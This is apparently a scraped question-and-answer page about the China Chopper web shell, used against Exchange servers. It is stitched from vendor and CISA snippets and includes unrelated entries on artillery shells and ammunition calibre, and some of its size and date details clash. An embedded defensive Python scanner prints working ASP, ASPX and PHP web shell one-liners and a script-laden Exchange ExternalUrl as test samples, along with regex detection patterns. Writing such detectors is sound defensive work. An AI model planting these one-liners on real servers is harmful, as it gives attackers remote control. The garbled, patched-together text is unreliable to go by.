Remote-access Guide

china chopper remote access trojan

by Joshua Lind Published 1 year ago Updated 1 year ago
What is China Chopper and how does it work?

China Chopper is a Web Shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. [1] It has been used by several threat groups. [2] [3] [4]

What is the China Chopper web shell?

Among web shells used by threat actors, the China Chopper web shell is one of the most widely used. One example is written in ASP. We have seen this malicious ASP code within a specially crafted file uploaded to web servers (Figure 2).

What language is China Chopper written in?

Another China Chopper variant is written in PHP. Meanwhile, the KRYPTON group uses a bespoke web shell written in C# within an ASP.NET page.

Figure 3. Web shell written in C# within an ASP.NET page

Once a web shell is successfully inserted into a web server, it can allow remote attackers to perform various tasks on the web server.

What is China Chopper in OAB VD?

In the OAB VD, the ExternalUrl parameter contains a "China Chopper" webshell which may permit a remote operator to dynamically execute JavaScript code on the compromised Microsoft Exchange Server. For a downloadable copy of IOCs, see: MAR-10331466-1.v1.stix.

What is China Chopper malware?

China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. This web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers.

How does a Webshell work?

During a web shell attack, a cybercriminal injects a malicious file into a target web server's directory and then executes that file from their web browser.

What is a shell cyber security?

Web shells are malicious scripts that enable threat actors to compromise web servers and launch additional attacks. Threat actors first penetrate a system or network and then install a web shell.

What is APT41?

APT41 is a prolific Chinese state-sponsored espionage group known to target organizations in both the public and private sectors and also conducts financially motivated activity for personal gain.

What is a PAS Webshell?

P.A.S. Webshell is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.

How does China Chopper work?

China Chopper is an increasingly popular Web shell that packs a powerful punch into a small package. In the space of just 4 kilobytes, the Web shell offers file and database management, code obfuscation, and more—all in an easy-to-use graphical user interface that even novices can use.

What does the backdoor script Webshell run on?

A generic PHP web shell backdoor allows attackers to run commands on your PHP server much like an administrator. At times, the attackers may also attempt to escalate privileges. Using this shell, the attackers can: Access any type of data on your server.

What is shell exploit?

A web shell exploit usually contains a backdoor that allows an attacker to remotely access and possibly control a server at any time. This would prevent the attacker from having to exploit a vulnerability whenever access to the compromised server is required.

What is shell bomb?

A shell, in a military context, is a projectile whose payload contains an explosive, incendiary, or other chemical filling. Originally it was called a bombshell, but "shell" has come to be unambiguous in a military context. Modern usage sometimes includes large solid kinetic projectiles that are properly termed shot.

What is a Godzilla Webshell?

Godzilla is a functionality-rich webshell that parses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.

How Web shells are installed?

Web shells are installed through vulnerabilities in web applications or weak server security configurations, including the following: SQL injection; vulnerabilities in applications and services (e.g. web server software such as NGINX or content management system applications such as WordPress);

What is PHP Webshell?

A web shell is a piece of malicious code, often written in typical web development programming languages such as ASP, PHP and JSP, that attackers implant on web servers to provide remote access and code execution to server functions.

How are shells measured?

Ammunition size is usually expressed in terms of calibre, which is the diameter of the projectile as measured in millimetres or inches. In general, projectiles less than 20 mm or .60 inch in diameter are classified as small-arm, and larger calibres are considered artillery.

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

Summary

CISA received three unique files for analysis. The files appear to contain configuration data for Microsoft Exchange Offline Address Book (OAB) Virtual Directories (VD) extracted from a Microsoft Exchange Server. The output file shows malicious modifications to the ExternalUrl parameter.

Mitigation

If you find these webshells as you are examining your system for Microsoft Exchange Vulnerabilities, please visit the https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities website for further information on remediation.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is China Chopper?

The fact that China Chopper is a tool used by certain APT groups and the fact that China Chopper was specifically used to attack the vulnerable Microsoft services leads us to believe that additional APT groups are targeting these vulnerabilities.

When was the zero day attack on China Chopper?

Over the last few days, Cynet identified a high number of China Chopper related web-shell attacks, which can be related to the zero-day attack posted by Microsoft on March 2nd.

What is the Cynet 360 attack?

Cynet 360 detected and prevented China Chopper web shell activity on several customers’ Exchange Servers. In all cases, the compromised servers were Internet Information Services (IIS), which potentially means that these attacks are related to the Microsoft vulnerabilities just published.

What is the role of threat groups in a compromised machine?

The threat group gains an initial foothold on the compromised machine for further post-exploitation activities such as persistence, privilege escalation, lateral movement and impact.

Is Exchange 2010 vulnerable?

It is important to note that an Exchange 2010 security update has also been issued, though the CVEs do not reference that version as being vulnerable.

Does China Chopper have a pattern?

We have detected that all China Chopper remote commands have a unique pattern that can help identify the execution of the malicious commands.

What web shell is used by threat actors?

Among web shells used by threat actors, the China Chopper web shell is one of the most widely used. One example is written in ASP:
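The "unique pattern" mentioned above, the ASP one-liner, and the script planted in the OAB ExternalUrl (described under "What is China Chopper in OAB VD?") all come down to the same thing from a defender's seat: a server-side eval fed directly from a request parameter. The following Python is an added example, not code from this page or from CISA, Cynet or Microsoft. It scans web-root files for the publicly documented China Chopper one-liners (classic ASP, ASPX/JScript and PHP variants) and checks an OAB ExternalUrl value for embedded server-side script. The regexes, the file-extension list, the forbidden-character set and every sample input are this example's own assumptions; the tampered ExternalUrl sample is constructed to match the MAR's description, not copied from it.

```python
"""
Added example (not code from the page or from any vendor it quotes): a
defender-side scanner for China Chopper-style web shells.

It checks two things the text above describes:
  1. file contents in a web root for the publicly documented China Chopper
     one-liners (classic ASP, ASPX/JScript and PHP variants);
  2. an Exchange OAB virtual directory ExternalUrl value, which should be a
     plain URL and never contain server-side script.
All sample inputs are constructed for this example.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

# Publicly documented China Chopper shapes plus one close relative
# (a <script runat="server"> block planted in a configuration value).
SIGNATURES = {
    # classic ASP:  <%eval request("pass")%>
    "asp_eval_request": re.compile(r"eval\s*\(?\s*request\s*[\(\[]", re.I),
    # ASPX/JScript: <%eval(Request.Item["password"],"unsafe");%>
    "aspx_eval_unsafe": re.compile(
        r"""eval\s*\(\s*Request(?:\.Item)?\s*\[[^\]]*\]\s*,\s*["']unsafe["']""", re.I),
    # PHP:          <?php @eval($_POST['password']);?>
    "php_eval_post": re.compile(r"@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I),
    # script block executed server-side, wherever it appears
    "script_runat_server": re.compile(r"<script[^>]*runat\s*=\s*[\"']server[\"']", re.I),
}

# File types a web server will execute; anything else is skipped by the walk
# (assumed list; extend it to match the server being examined).
WEB_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".php", ".jsp", ".jspx"}

# Characters that never belong in a legitimate OAB ExternalUrl (assumption).
URL_FORBIDDEN = set('<>"\'(){};')


def scan_text(text: str) -> list[str]:
    """Return the names of all signatures that match the given content."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def check_external_url(value: str) -> list[str]:
    """Return reasons an OAB ExternalUrl value looks tampered with (empty = clean)."""
    reasons = []
    parsed = urlparse(value)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        reasons.append("not a plain http(s) URL")
    bad = sorted(URL_FORBIDDEN & set(value))
    if bad:
        reasons.append("forbidden characters: " + "".join(bad))
    reasons.extend("matches " + name for name in scan_text(value))
    return reasons


def scan_directory(root: str) -> dict[str, list[str]]:
    """Walk a web root read-only and map each flagged file path to its signature hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                found = scan_text(fh.read())
            if found:
                hits[path] = found
    return hits


# --- constructed samples (not real artefacts from any incident) ---------------
CHOPPER_ASP = '<%eval request("pass")%>'
CHOPPER_ASPX = '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>'
CHOPPER_PHP = "<?php @eval($_POST['password']);?>"
BENIGN_PHP = "<?php echo htmlspecialchars($_POST['name']); ?>"
BENIGN_OAB_URL = "https://mail.example.com/OAB"
# Constructed to match the MAR's description of script planted in ExternalUrl.
TAMPERED_OAB_URL = ('http://f/<script language="JScript" runat="server">'
                    'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>')

if __name__ == "__main__":
    # Demo: drop the samples into a temporary "web root" and scan it.
    with tempfile.TemporaryDirectory() as root:
        for name, body in [("ok.php", BENIGN_PHP), ("x.aspx", CHOPPER_ASPX), ("notes.txt", CHOPPER_PHP)]:
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        for path, found in scan_directory(root).items():
            print(f"FLAGGED {path}: {', '.join(found)}")
    print("OAB ExternalUrl:", check_external_url(TAMPERED_OAB_URL) or "clean")
```

Treat this as a triage aid, not a verdict: it catches only the unobfuscated one-liners, so a variant that splits or encodes the `eval` call will pass. During an investigation run it read-only against a copy of the web root, and pair it with file hashes, YARA rules and web server access logs (POST requests to a recently created script file are the usual corroborating signal).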

What is the purpose of checking perimeter firewall and proxy?

Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.

What are the weaknesses of internet-facing servers?

These include the lack of the latest security updates, antivirus tools, network protection, proper security configuration, and informed security monitoring. Interestingly, we observed that attacks usually occur on weekends or during off-hours, when attacks are likely not immediately spotted and responded to.

Is China Chopper a backdoor Trojan?

A Web shell that's equally compatible with both Linux and Windows-based PCs, China Chopper is another backdoor Trojan used in targeted attacks against specific companies – most likely for the sake of corporate espionage, although China Chopper's attacks are equally effective for other criminal purposes.

Is China Chopper a malware?

The infectious component of China Chopper is well under a single megabyte in size, and most anti-malware products have not yet developed a proper identification entry for China Chopper – despite China Chopper having been identified as a PC threat since at least November of last year.

What are the major threat actors known to leverage web shell techniques in their attacks?

Some major threat actors commonly known to leverage web shell techniques in their attacks include APT39, Deep Panda, Leviathan, and APT34 (or OilRig).

What is the APT39?

APT39 has installed ANTAK and ASPXSPY web shells. APT39 is an Iranian cyber espionage group that has been active since at least 2014. They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran's national priorities.
